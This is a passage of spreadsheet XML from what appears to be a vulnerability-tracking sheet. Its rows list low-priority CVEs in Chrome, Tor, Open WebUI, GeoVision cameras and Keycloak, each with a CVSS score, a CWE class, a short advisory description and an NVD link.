      <c r="G4119" s="5" t="inlineStr"/>
      <c r="H4119" s="5" t="inlineStr"/>
      <c r="I4119" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4119" s="5" t="inlineStr"/>
      <c r="K4119" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4119" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebAppInstalls in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87580</t>
        </is>
      </c>
    </row>
    <row r="4120">
      <c r="A4120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87584</t>
        </is>
      </c>
      <c r="C4120" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4120" s="5" t="inlineStr"/>
      <c r="F4120" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4120" s="5" t="inlineStr"/>
      <c r="H4120" s="5" t="inlineStr"/>
      <c r="I4120" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4120" s="5" t="inlineStr"/>
      <c r="K4120" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4120" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87584</t>
        </is>
      </c>
    </row>
    <row r="4121">
      <c r="A4121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87589</t>
        </is>
      </c>
      <c r="C4121" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4121" s="5" t="inlineStr"/>
      <c r="F4121" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4121" s="5" t="inlineStr"/>
      <c r="H4121" s="5" t="inlineStr"/>
      <c r="I4121" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4121" s="5" t="inlineStr"/>
      <c r="K4121" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4121" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87589</t>
        </is>
      </c>
    </row>
    <row r="4122">
      <c r="A4122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87591</t>
        </is>
      </c>
      <c r="C4122" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4122" s="5" t="inlineStr"/>
      <c r="F4122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4122" s="5" t="inlineStr"/>
      <c r="H4122" s="5" t="inlineStr"/>
      <c r="I4122" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4122" s="5" t="inlineStr"/>
      <c r="K4122" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4122" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87591</t>
        </is>
      </c>
    </row>
    <row r="4123">
      <c r="A4123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87593</t>
        </is>
      </c>
      <c r="C4123" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4123" s="5" t="inlineStr"/>
      <c r="F4123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4123" s="5" t="inlineStr"/>
      <c r="H4123" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4123" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4123" s="5" t="inlineStr"/>
      <c r="K4123" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4123" s="5" t="inlineStr">
        <is>
          <t>Information leak in Editing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87593</t>
        </is>
      </c>
    </row>
    <row r="4124">
      <c r="A4124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87600</t>
        </is>
      </c>
      <c r="C4124" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4124" s="5" t="inlineStr"/>
      <c r="F4124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4124" s="5" t="inlineStr"/>
      <c r="H4124" s="5" t="inlineStr"/>
      <c r="I4124" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4124" s="5" t="inlineStr"/>
      <c r="K4124" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4124" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Safebrowsing in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87600</t>
        </is>
      </c>
    </row>
    <row r="4125">
      <c r="A4125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87603</t>
        </is>
      </c>
      <c r="C4125" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4125" s="5" t="inlineStr"/>
      <c r="F4125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4125" s="5" t="inlineStr"/>
      <c r="H4125" s="5" t="inlineStr"/>
      <c r="I4125" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4125" s="5" t="inlineStr"/>
      <c r="K4125" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4125" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87603</t>
        </is>
      </c>
    </row>
    <row r="4126">
      <c r="A4126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87610</t>
        </is>
      </c>
      <c r="C4126" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4126" s="5" t="inlineStr"/>
      <c r="F4126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4126" s="5" t="inlineStr"/>
      <c r="H4126" s="5" t="inlineStr"/>
      <c r="I4126" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4126" s="5" t="inlineStr"/>
      <c r="K4126" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4126" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Omnibox in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87610</t>
        </is>
      </c>
    </row>
    <row r="4127">
      <c r="A4127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87620</t>
        </is>
      </c>
      <c r="C4127" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4127" s="5" t="inlineStr"/>
      <c r="F4127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4127" s="5" t="inlineStr"/>
      <c r="H4127" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4127" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4127" s="5" t="inlineStr"/>
      <c r="K4127" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L4127" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in SVG in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87620</t>
        </is>
      </c>
    </row>
    <row r="4128">
      <c r="A4128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87623</t>
        </is>
      </c>
      <c r="C4128" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4128" s="5" t="inlineStr"/>
      <c r="F4128" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4128" s="5" t="inlineStr"/>
      <c r="H4128" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4128" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4128" s="5" t="inlineStr"/>
      <c r="K4128" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L4128" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in DOM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87623</t>
        </is>
      </c>
    </row>
    <row r="4129">
      <c r="A4129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87626</t>
        </is>
      </c>
      <c r="C4129" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4129" s="5" t="inlineStr"/>
      <c r="F4129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4129" s="5" t="inlineStr"/>
      <c r="H4129" s="5" t="inlineStr"/>
      <c r="I4129" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4129" s="5" t="inlineStr"/>
      <c r="K4129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4129" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DeviceBoundSessionCredentials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87626</t>
        </is>
      </c>
    </row>
    <row r="4130">
      <c r="A4130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87629</t>
        </is>
      </c>
      <c r="C4130" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4130" s="5" t="inlineStr"/>
      <c r="F4130" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4130" s="5" t="inlineStr"/>
      <c r="H4130" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4130" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4130" s="5" t="inlineStr"/>
      <c r="K4130" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4130" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Sources in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87629</t>
        </is>
      </c>
    </row>
    <row r="4131">
      <c r="A4131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87631</t>
        </is>
      </c>
      <c r="C4131" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4131" s="5" t="inlineStr"/>
      <c r="F4131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4131" s="5" t="inlineStr"/>
      <c r="H4131" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4131" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4131" s="5" t="inlineStr"/>
      <c r="K4131" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4131" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DOM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87631</t>
        </is>
      </c>
    </row>
    <row r="4132">
      <c r="A4132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87724</t>
        </is>
      </c>
      <c r="C4132" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4132" s="5" t="inlineStr"/>
      <c r="F4132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4132" s="5" t="inlineStr"/>
      <c r="H4132" s="5" t="inlineStr"/>
      <c r="I4132" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4132" s="5" t="inlineStr"/>
      <c r="K4132" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L4132" s="5" t="inlineStr">
        <is>
          <t>Tor before 0.4.9.12 interprets the CC_RESPONSE extension even when CC_REQUEST was not sent, which allows remote attackers to cause a denial of service (crash) because of corrupted congestion-control state. This is TROVE-2026-032.</t>
        </is>
      </c>
      <c r="M4132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87724</t>
        </is>
      </c>
    </row>
    <row r="4133">
      <c r="A4133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88000</t>
        </is>
      </c>
      <c r="C4133" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4133" s="5" t="inlineStr"/>
      <c r="F4133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4133" s="5" t="inlineStr"/>
      <c r="H4133" s="5" t="inlineStr"/>
      <c r="I4133" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4133" s="5" t="inlineStr"/>
      <c r="K4133" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4133" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/chats/{id}/messages/{message_id} used the chat-history deletion helper in backend/open_webui/models/chats.py to follow childrenIds without recording visited message identifiers. An authenticated user could store a cyclic chat tree and delete a message, causing a synchronous infinite loop on the server request loop that blocked every user's requests until the process was killed. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M4133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88000</t>
        </is>
      </c>
    </row>
    <row r="4134">
      <c r="A4134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88002</t>
        </is>
      </c>
      <c r="C4134" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4134" s="5" t="inlineStr"/>
      <c r="F4134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4134" s="5" t="inlineStr"/>
      <c r="H4134" s="5" t="inlineStr"/>
      <c r="I4134" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4134" s="5" t="inlineStr"/>
      <c r="K4134" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4134" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.5.0 until 0.11.1, the message-chain reconstruction helper in backend/open_webui/utils/misc.py advanced through a chat history by map key but tracked visited entries using each message body's optional id field. An authenticated user could store id-less messages in a parent cycle and trigger a non-terminating walk that blocked the async event loop, grew memory until termination, and remained persistent across process restarts. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M4134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88002</t>
        </is>
      </c>
    </row>
    <row r="4135">
      <c r="A4135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88005</t>
        </is>
      </c>
      <c r="C4135" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4135" s="5" t="inlineStr"/>
      <c r="F4135" s="5" t="inlineStr"/>
      <c r="G4135" s="5" t="inlineStr"/>
      <c r="H4135" s="5" t="inlineStr"/>
      <c r="I4135" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4135" s="5" t="inlineStr"/>
      <c r="K4135" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4135" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.0 until 0.9.0, Open WebUI's OAuth token exchange endpoint issues a session for a provider access token without applying the email domain allowlist that the normal OAuth login callback enforces. An account whose email domain the login callback would refuse could still obtain a working session through this endpoint. This issue is fixed in version 0.9.0.</t>
        </is>
      </c>
      <c r="M4135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88005</t>
        </is>
      </c>
    </row>
    <row r="4136">
      <c r="A4136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88006</t>
        </is>
      </c>
      <c r="C4136" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4136" s="5" t="inlineStr"/>
      <c r="F4136" s="5" t="inlineStr"/>
      <c r="G4136" s="5" t="inlineStr"/>
      <c r="H4136" s="5" t="inlineStr"/>
      <c r="I4136" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4136" s="5" t="inlineStr"/>
      <c r="K4136" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4136" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.0 until 0.11.1, Open WebUI's OAuth token exchange endpoint issues a session for a provider access token without running the OAuth role management that the normal OAuth login callback runs. A user whose provider roles the login callback would refuse, or would demote, could still obtain a working session at their existing role through this endpoint. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M4136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88006</t>
        </is>
      </c>
    </row>
    <row r="4137">
      <c r="A4137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88268</t>
        </is>
      </c>
      <c r="C4137" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4137" s="5" t="inlineStr"/>
      <c r="F4137" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4137" s="5" t="inlineStr"/>
      <c r="H4137" s="5" t="inlineStr"/>
      <c r="I4137" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4137" s="5" t="inlineStr"/>
      <c r="K4137" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L4137" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211
V1.13 contains an authenticated stack buffer overflow in SSVR fragment
reassembly that allows a valid user to crash the SSVR service.</t>
        </is>
      </c>
      <c r="M4137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88268</t>
        </is>
      </c>
    </row>
    <row r="4138">
      <c r="A4138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88269</t>
        </is>
      </c>
      <c r="C4138" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4138" s="5" t="inlineStr"/>
      <c r="F4138" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4138" s="5" t="inlineStr"/>
      <c r="H4138" s="5" t="inlineStr"/>
      <c r="I4138" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4138" s="5" t="inlineStr"/>
      <c r="K4138" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4138" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows a Guest user to retrieve persistent device configuration containing plaintext administrative and user credentials through SSVR.</t>
        </is>
      </c>
      <c r="M4138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88269</t>
        </is>
      </c>
    </row>
    <row r="4139">
      <c r="A4139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88270</t>
        </is>
      </c>
      <c r="C4139" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4139" s="5" t="inlineStr"/>
      <c r="F4139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4139" s="5" t="inlineStr"/>
      <c r="H4139" s="5" t="inlineStr"/>
      <c r="I4139" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4139" s="5" t="inlineStr"/>
      <c r="K4139" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4139" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows a Guest user to enter SSVR firmware-upgrade mode and disrupt live services before any firmware image is validated.</t>
        </is>
      </c>
      <c r="M4139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88270</t>
        </is>
      </c>
    </row>
    <row r="4140">
      <c r="A4140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88288</t>
        </is>
      </c>
      <c r="C4140" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4140" s="5" t="inlineStr"/>
      <c r="F4140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4140" s="5" t="inlineStr"/>
      <c r="H4140" s="5" t="inlineStr"/>
      <c r="I4140" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4140" s="5" t="inlineStr"/>
      <c r="K4140" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L4140" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to restrict the filename supplied to BKDownloadLink.cgi, allowing a remote user with valid web credentials to read arbitrary files accessible to the root-run web service.</t>
        </is>
      </c>
      <c r="M4140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88288</t>
        </is>
      </c>
    </row>
    <row r="4141">
      <c r="A4141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88770</t>
        </is>
      </c>
      <c r="C4141" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4141" s="5" t="inlineStr"/>
      <c r="F4141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4141" s="5" t="inlineStr"/>
      <c r="H4141" s="5" t="inlineStr"/>
      <c r="I4141" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4141" s="5" t="inlineStr"/>
      <c r="K4141" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L4141" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Device Authorization Grant flow of Keycloak, an identity and access management solution. The issue occurs because the token redemption process fails to check if a user account is currently locked due to brute-force protection. If an attacker has an active session for a locked account, they can complete the device login process and receive new security tokens. This allows the attacker to maintain access to the account even when it should be temporarily disabled to prevent unauthorized entry.</t>
        </is>
      </c>
      <c r="M4141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88770</t>
        </is>
      </c>
    </row>
    <row r="4142">
      <c r="A4142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4142" s="5" t="inlineStr">
        <is>
